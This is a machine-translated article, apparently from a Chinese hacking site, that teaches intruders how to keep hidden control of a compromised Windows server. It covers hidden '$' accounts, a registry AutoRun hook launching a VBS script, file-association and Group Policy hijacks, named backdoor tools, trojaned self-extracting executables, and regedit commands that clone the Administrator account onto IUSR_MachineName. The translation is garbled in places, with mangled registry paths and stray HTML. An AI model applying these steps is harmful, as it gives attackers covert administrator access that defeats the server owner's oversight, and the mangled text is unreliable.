What are the methods used by hackers to access the server?

The following articles mainly show you how hackers can hide their actual operations on the server. The following hidden solutions are summarized by myself in actual operations, depends on the situation. The following methods are generally used to hide a server:

I like hiding in Tibet, so I have come up with some hidden solutions, depending on the situation.

The following methods are generally used to hide a server:

1. superdoor clone, but there is a bug. The ca clone of Rong Ge depends on ipc, which is not very nice.

2. Create a hidden account like count $, which cannot be seen by netuser, but can be seen in "manage-> User, in addition, an unknown account is displayed in "My computer-> properties-> User Configuration File", and there will be a folder named count $ in document and setting, which is not particularly good, I killed all the results on three or more machines.

3. Write a guest. when vbs is started, create an account or activate a guest user or tsinternetuser, and import the key value (prepared in advance) in winlogon in the registry so that it can start up and run guest. vbs to create a ghost account.

Or import the data in [HKEY_LOCAL_MACHINESoftwareMicrosoftCommand Processor]

"AutoRun" = "C: \ Program Files \ guest. vbs"

In this way, it is associated with cmd and will be created as long as it is run.

4. Associate the txt and exe files as the glaciers do. Run the txt file to run our program.

5. Configure the self-running items in the Group Policy.

6. Set File Association. Activate vbs when you run notepad or whatever.

7. Planting backdoor such as hackdefender, hacksdoor, winshell, and Wuhan boys is easy to be scanned and killed. If there is no transformation, there is almost no effect. If it is not killed, then ...... Hey!

8. Replace the commonly used files with rar self-extracting files. It contains both the original exe file and runs its own program (that is, the winrar is not bound to be scanned and killed). After running the program, repeat steps 3, 4, and 5.

9. When searching, I found that hideadmin is a good tool and requires the administrator permission to hide users whose names end with $. This is awesome! The command line and management interface cannot be found in the user configuration file. It is a single word, strong! I had no idea how to get rid of it for a long time. Let him stay! Then, the instructor also has a tool, which is similar.

10. Replace telnet or termsvc with another service or create a new one.

11. Manually clone and hide accounts in the registry. A seemingly cool method is circulating on the Internet. However, my 2000 server test may be due to a reason not in the domain, the domains or account key value does not exist at all, so it cannot be found.

But let's go into details:

In Windows 2000 and Windows NT, the default Administrator Account SID is fixed 500 (0x1f4), so we can use an existing account in the machine to clone the account whose SID is 500, here, the account we selected is IUSR_MachineName (to enhance concealment ).

Under cmd,

Regedit/e admin. reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4

Export the information of the Administrator account whose SID is 500, edit the admin. reg file, and set the third line of the admin. reg file

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]

The last '1f4 'is changed to the SID of IUSR_MachineName (the user's SID for most machines is 0x3E9. If IIS is not installed on the machine during initial installation, if you create an account and then install IIS, it may not be the value. in the reg file, modify '1f4 'to '3e9' and execute the command. Then, you need to modify the value of that account.

Regedit/e iusr. reg hkey_local_machinesamsamdomainsaccountusers%3e9

Copy the "V = hex: 0" in the iusr. reg file until the end of the iusr. reg file, and replace the parts in the same position in adam. reg. Finally, use regedit/s adam. reg to import the Reg file and run net user IUSR_MachineName password to change the password of IUSR_MachineName. OK, all done!

Now the iusr_machinenameaccount has the authority limit, but you can use net.exe and the user management in the management tool to see no trace, even if you view the group and user, there is no difference before the modification.

The above content is an introduction to how hackers can hide their methods when entering the server. I hope you will gain some benefits.

498) this. style. width = 498; "srcwidth =" 500 "srcheight =" 362 "zoomrate =" 1 ">

The above content is a description of how hackers hide their methods when they enter the server, hoping to help you in this regard.